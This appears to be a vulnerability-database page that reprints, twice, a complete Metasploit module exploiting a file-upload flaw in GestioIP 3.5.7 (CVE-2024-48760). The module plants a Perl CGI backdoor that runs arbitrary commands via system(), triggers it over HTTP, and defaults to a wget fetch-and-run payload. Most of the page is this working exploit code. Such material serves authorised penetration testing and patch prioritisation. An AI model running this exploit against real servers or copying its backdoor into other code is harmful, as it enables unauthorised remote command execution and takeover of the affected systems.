GestioIP 3.5.7 Remote Command Execution_MSF:EXPLOIT-MULTI-HTTP-GESTIOIP_RCE-

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This module exploits a command execution via file upload. If GestioIP is configured to use no authentication for admin account, no password is required to exploit the vulnerability. Otherwise, an authenticated user with admin right on the web site is...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-MULTI-HTTP-GESTIOIP_RCE-

Published May 14, 2026 at 19:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'GestioIP 3.5.7 Remote Command Execution',
'Description' => %q{
This module exploits a command execution via file upload.
If GestioIP is configured to use no authentication for admin account,
no password is required to exploit the vulnerability. Otherwise, an authenticated
user with admin right on the web site is required to exploit.
},
'License' => MSF_LICENSE,
'Author' => [
'maxibelino', # Original finder of CVE-2024-48760
'odeez24' # Metasploit module
],
'References' => [
[ 'CVE', '2024-48760' ],
[ 'URL', 'https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760']
],
'Platform' => [ 'linux' ],
'Targets' => [
[
'Linux/unix Command',
{
'Arch' => [ ARCH_CMD ],
'Platform' => ['linux'],
'Type' => :nix_fetch,
'DefaultOptions' => {
'FETCH_COMMAND' => 'WGET',
'FETCH_DELETE' => true
}
}
]
],
'Privileged' => false,
'DisclosureDate' => '2025-01-14',
'DefaultTarget' => 0,
'Notes' => {
'Reliability' => [REPEATABLE_SESSION],
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
}
)
)

register_options(
[
OptString.new('USERNAME', [true, 'The username to auth as with admin right', 'gipadmin']),
OptString.new('PASSWORD', [true, 'The password to auth with', '']),
]
)
end

def backdoor_content(payload = nil)
<<~PERL
#!/usr/bin/perl -w

use strict;

print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";

system(q(#{payload}));
PERL
end

def original_content
<<~'PERL'
#!/usr/bin/perl

use Cwd;
use CGI;

my $debug = 1;
my $q = new CGI;

my ($status, $message, $exit);
my $output_type_header = "text/xml";
$exit = 0;

my $filename = $q->param("file_name") || "";

print STDERR "FOUND FILENAME: $filename\n" if $debug;

if ( $filename !~ /^[A-Za-z0-9-_.]+$/ ){
$message = "ERROR: only the following characters are allowed for file_name: A-Z,a-z,0-9,-,_,.";
$status ="400 Bad Request";
$exit = 1;
printResponse(
message => "$message",
status => "$status",
exit => "$exit",
);
}

$POST_MAX=1024 * 10000; # 10MB max
my $content_length = defined $ENV{'CONTENT_LENGTH'} ? $ENV{'CONTENT_LENGTH'} : 0;
if (($POST_MAX > 0) && ($content_length > $POST_MAX)) {
$message = "ERROR: Upload is limited to a file size of max. 10MB";
print STDERR "$message\n" if $debug;
$status ="500 Internal Server Error";
$exit = 1;
printResponse(
message => "$message",
status => "$status",
exit => "$exit",
);
}

my $lightweight_fh = $q->upload('leases_file');

if (defined $lightweight_fh) {

print STDERR "HANDLE DEFINED\n" if $debug;

# Upgrade the handle to one compatible with IO::Handle:
my $io_handle = $lightweight_fh->handle;

my $file = '/usr/share/gestioip/var/data/' . $filename;
open (OUTFILE,'>', "$filename") or $message = "ERROR: can not open file to write: $!";

if ( $message ) {
print STDERR "$message\n" if $debug;
$status ="500 Internal Server Error";
$exit = 1;
printResponse(
message => "$message",
status => "$status",
exit => "$exit",
);
}

while ($bytesread = $io_handle->read($buffer,1024)) {
print OUTFILE $buffer;
}

close OUTFILE;

} else {
print STDERR "NO HANDLE DEFINED\n" if $debug;
$message = "ERROR: No leases file received";
$status ="400 Bad Request";
$exit = 1;
printResponse(
message => "$message",
status => "$status",
exit => "$exit",
);
}

$status ="200 OK";
printResponse(
message => "OK",
status => "$status",
exit => "$exit",
);

###################
#### Subroutines
###################

sub printResponse {
my %args = @_;

my $status = $args{status} || "";
my $message = $args{message} || "";
my $exit = $args{exit} || 0;

my $output = "";
$output .= "<?xml version='1.0' encoding='UTF-8'?>\n";
$output .= "<Result>\n";
$output .= " <Message>$message</Message>\n";
$output .= "</Result>\n";

printHtmlHeader(
type => "$output_type_header",
status => "200 OK",
);

print $output;

exit $exit;
}

sub printHtmlHeader {
my %args = @_;

my $type = $args{type} || "";
$type = "-type => \"$type\"" if $type;
my $status = $args{status} || "";
$status = "-status => \"$status\"" if $status;

my $header_params = $type . "," . $allow . "," . $location . "," . $status;
$header_params =~ s/^,//;
$header_params =~ s/,$//;

print $q->header( eval($header_params) );
}

#curl \
# -F "userid=1" \
# -F "filecomment=This is an image file" \
# -F "image=@/home/user1/Desktop/test.jpg" \
# localhost/uploader.php
PERL
end

def check
print_status('Checking if the target is reachable...')
if upload_file('README_server.txt', '')
return Exploit::CheckCode::Vulnerable('File upload successful, the target is vulnerable GestioIP')
end

Exploit::CheckCode::Safe('Target is not vulnerable')
end

# Upload the file on the target server
#
# @param filename [String] the filename to upload
# @param content [String] the content
# @return [Boolean] true if the file was successfully uploaded, false otherwise.
def upload_file(filename, content)
data = Rex::MIME::Message.new
data.add_part(
filename,
nil,
nil,
'form-data; name="file_name"'
)
data.add_part(
content,
'application/x-httpd-cgi',
nil,
"form-data; name=\"leases_file\"; filename=\"#{filename}\""
)

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/api/upload.cgi'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
})
if res&.code == 200
if res.body.include?('ERROR')
return false
end

return true
elsif res.code == 401
print_error('Authentification refused, Please give valid admin login informations')
return false
else
return false
end
end

# Upload the payload for linux system to the target.
def execute_linux
print_status('Executing payload on the target server ...')
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/api/upload.cgi'),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
})
print_good('Payload successfully executed')
end

# Restore the original content of the target_link to remove the backdoor
# script.
def on_new_session(session)
super
begin
print_status('Cleaning up backdoor file on target server ...')
if session.type == 'meterpreter'
session.fs.file.rm('README_server.txt')
session.fs.file.new('upload.cgi', 'wb').write(original_content)
fd.close
else
session.shell_command_token('rm README_server.txt')
session.shell_command_token("echo #{Base64.strict_encode64(original_content)} | base64 -d > upload.cgi")
end
print_good('Backdoor file successfully removed')
end
end

# Main method to run the exploit.
def exploit
print_status('Upload the backdoor file ...')
content = backdoor_content(payload.encoded)
unless (upload_file('upload.cgi', content))
fail_with(Failure::NotVulnerable, 'Unable to upload the backdoor file')
end
print_good('Backdoor file successfully uploaded')
execute_linux
end
end

{
    "lastseen": "2026-05-14T19:28:01",
    "description": "This module exploits a command execution via file upload. If GestioIP is configured to use no authentication for admin account, no password is required to exploit the vulnerability. Otherwise, an authenticated user with admin right on the web site is...",
    "published": "2026-05-14T19:00:11",
    "modified": "2026-05-14T19:00:11",
    "type": "metasploit",
    "title": "GestioIP 3.5.7 Remote Command Execution",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-MULTI-HTTP-GESTIOIP_RCE-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2024-48760"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'GestioIP 3.5.7 Remote Command Execution',\n        'Description' => %q{\n          This module exploits a command execution via file upload.\n          If GestioIP is configured to use no authentication for admin account,\n          no password is required to exploit the vulnerability. Otherwise, an authenticated\n          user with admin right on the web site is required to exploit.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'maxibelino', # Original finder of CVE-2024-48760\n          'odeez24' # Metasploit module\n        ],\n        'References' => [\n          [ 'CVE', '2024-48760' ],\n          [ 'URL', 'https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760']\n        ],\n        'Platform' => [ 'linux' ],\n        'Targets' => [\n          [\n            'Linux/unix Command',\n            {\n              'Arch' => [ ARCH_CMD ],\n              'Platform' => ['linux'],\n              'Type' => :nix_fetch,\n              'DefaultOptions' => {\n                'FETCH_COMMAND' => 'WGET',\n                'FETCH_DELETE' => true\n              }\n            }\n          ]\n        ],\n        'Privileged' => false,\n        'DisclosureDate' => '2025-01-14',\n        'DefaultTarget' => 0,\n        'Notes' => {\n          'Reliability' => [REPEATABLE_SESSION],\n          'Stability' => [CRASH_SAFE],\n          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]\n        }\n      )\n    )\n\n    register_options(\n      [\n        OptString.new('USERNAME', [true, 'The username to auth as with admin right', 'gipadmin']),\n        OptString.new('PASSWORD', [true, 'The password to auth with', '']),\n      ]\n    )\n  end\n\n  def backdoor_content(payload = nil)\n    <<~PERL\n      #!/usr/bin/perl -w\n\n      use strict;\n\n      print \"Cache-Control: no-cache\\n\";\n      print \"Content-type: text/html\\n\\n\";\n\n      system(q(#{payload}));\n    PERL\n  end\n\n  def original_content\n    <<~'PERL'\n      #!/usr/bin/perl\n\n      use Cwd;\n      use CGI;\n\n      my $debug = 1;\n      my $q = new CGI;\n\n      my ($status, $message, $exit);\n      my $output_type_header = \"text/xml\";\n      $exit = 0;\n\n      my $filename = $q->param(\"file_name\") || \"\";\n\n      print STDERR \"FOUND FILENAME: $filename\\n\" if $debug;\n\n      if ( $filename !~ /^[A-Za-z0-9-_.]+$/ ){\n        $message = \"ERROR: only the following characters are allowed for file_name: A-Z,a-z,0-9,-,_,.\";\n        $status =\"400 Bad Request\";\n        $exit = 1;\n        printResponse(\n          message   => \"$message\",\n          status => \"$status\",\n          exit => \"$exit\",\n        );\n      }\n\n      $POST_MAX=1024 * 10000;  # 10MB max\n      my $content_length = defined $ENV{'CONTENT_LENGTH'} ? $ENV{'CONTENT_LENGTH'} : 0;\n      if (($POST_MAX > 0) && ($content_length > $POST_MAX)) {\n        $message = \"ERROR: Upload is limited to a file size of max. 10MB\";\n        print STDERR \"$message\\n\" if $debug;\n        $status =\"500 Internal Server Error\";\n        $exit = 1;\n        printResponse(\n          message   => \"$message\",\n          status => \"$status\",\n          exit => \"$exit\",\n        );\n      }\n\n      my $lightweight_fh  = $q->upload('leases_file');\n\n\n\n      if (defined $lightweight_fh) {\n\n        print STDERR \"HANDLE DEFINED\\n\" if $debug;\n\n        # Upgrade the handle to one compatible with IO::Handle:\n        my $io_handle = $lightweight_fh->handle;\n\n        my $file = '/usr/share/gestioip/var/data/' . $filename;\n        open (OUTFILE,'>', \"$filename\") or $message = \"ERROR: can not open file to write: $!\";\n\n        if ( $message ) {\n          print STDERR \"$message\\n\" if $debug;\n          $status =\"500 Internal Server Error\";\n          $exit = 1;\n          printResponse(\n            message   => \"$message\",\n            status => \"$status\",\n            exit => \"$exit\",\n          );\n        }\n\n        while ($bytesread = $io_handle->read($buffer,1024)) {\n                print OUTFILE $buffer;\n        }\n\n        close OUTFILE;\n\n      } else {\n        print STDERR \"NO HANDLE DEFINED\\n\" if $debug;\n        $message = \"ERROR: No leases file received\";\n        $status =\"400 Bad Request\";\n        $exit = 1;\n        printResponse(\n                message   => \"$message\",\n                status => \"$status\",\n                exit => \"$exit\",\n        );\n      }\n\n\n      $status =\"200 OK\";\n      printResponse(\n        message   => \"OK\",\n        status => \"$status\",\n        exit => \"$exit\",\n      );\n\n\n\n      ###################\n      #### Subroutines\n      ###################\n\n      sub printResponse {\n        my %args = @_;\n\n        my $status = $args{status} || \"\";\n        my $message = $args{message} || \"\";\n        my $exit = $args{exit} || 0;\n\n        my $output = \"\";\n        $output .= \"<?xml version='1.0' encoding='UTF-8'?>\\n\";\n        $output .= \"<Result>\\n\";\n        $output .= \"    <Message>$message</Message>\\n\";\n        $output .= \"</Result>\\n\";\n\n        printHtmlHeader(\n          type   => \"$output_type_header\",\n          status => \"200 OK\",\n        );\n\n        print $output;\n\n        exit $exit;\n      }\n\n      sub printHtmlHeader {\n        my %args = @_;\n\n        my $type = $args{type} || \"\";\n        $type = \"-type => \\\"$type\\\"\" if $type;\n        my $status = $args{status} || \"\";\n        $status = \"-status => \\\"$status\\\"\" if $status;\n\n        my $header_params = $type . \",\" . $allow . \",\" . $location . \",\" . $status;\n        $header_params =~ s/^,//;\n        $header_params =~ s/,$//;\n\n        print $q->header( eval($header_params) );\n      }\n\n      #curl \\\n      #  -F \"userid=1\" \\\n      #  -F \"filecomment=This is an image file\" \\\n      #  -F \"image=@/home/user1/Desktop/test.jpg\" \\\n      #  localhost/uploader.php\n    PERL\n  end\n\n  def check\n    print_status('Checking if the target is reachable...')\n    if upload_file('README_server.txt', '')\n      return Exploit::CheckCode::Vulnerable('File upload successful, the target is vulnerable GestioIP')\n    end\n\n    Exploit::CheckCode::Safe('Target is not vulnerable')\n  end\n\n  # Upload the file on the target server\n  #\n  # @param filename [String] the filename to upload\n  # @param content [String] the content\n  # @return [Boolean] true if the file was successfully uploaded, false otherwise.\n  def upload_file(filename, content)\n    data = Rex::MIME::Message.new\n    data.add_part(\n      filename,\n      nil,\n      nil,\n      'form-data; name=\"file_name\"'\n    )\n    data.add_part(\n      content,\n      'application/x-httpd-cgi',\n      nil,\n      \"form-data; name=\\\"leases_file\\\"; filename=\\\"#{filename}\\\"\"\n    )\n\n    res = send_request_cgi({\n      'method' => 'POST',\n      'uri' => normalize_uri(target_uri.path, '/api/upload.cgi'),\n      'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n      'data' => data.to_s,\n      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])\n    })\n    if res&.code == 200\n      if res.body.include?('ERROR')\n        return false\n      end\n\n      return true\n    elsif res.code == 401\n      print_error('Authentification refused, Please give valid admin login informations')\n      return false\n    else\n      return false\n    end\n  end\n\n  # Upload the payload for linux system to the target.\n  def execute_linux\n    print_status('Executing payload on the target server ...')\n    send_request_cgi({\n      'method' => 'GET',\n      'uri' => normalize_uri(target_uri.path, '/api/upload.cgi'),\n      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])\n    })\n    print_good('Payload successfully executed')\n  end\n\n  # Restore the original content of the target_link to remove the backdoor\n  #   script.\n  def on_new_session(session)\n    super\n    begin\n      print_status('Cleaning up backdoor file on target server ...')\n      if session.type == 'meterpreter'\n        session.fs.file.rm('README_server.txt')\n        session.fs.file.new('upload.cgi', 'wb').write(original_content)\n        fd.close\n      else\n        session.shell_command_token('rm README_server.txt')\n        session.shell_command_token(\"echo #{Base64.strict_encode64(original_content)} | base64 -d > upload.cgi\")\n      end\n      print_good('Backdoor file successfully removed')\n    end\n  end\n\n  # Main method to run the exploit.\n  def exploit\n    print_status('Upload the backdoor file ...')\n    content = backdoor_content(payload.encoded)\n    unless (upload_file('upload.cgi', content))\n      fail_with(Failure::NotVulnerable, 'Unable to upload the backdoor file')\n    end\n    print_good('Backdoor file successfully uploaded')\n    execute_linux\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/gestioip_rce.rb",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/multi/http/gestioip_rce/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply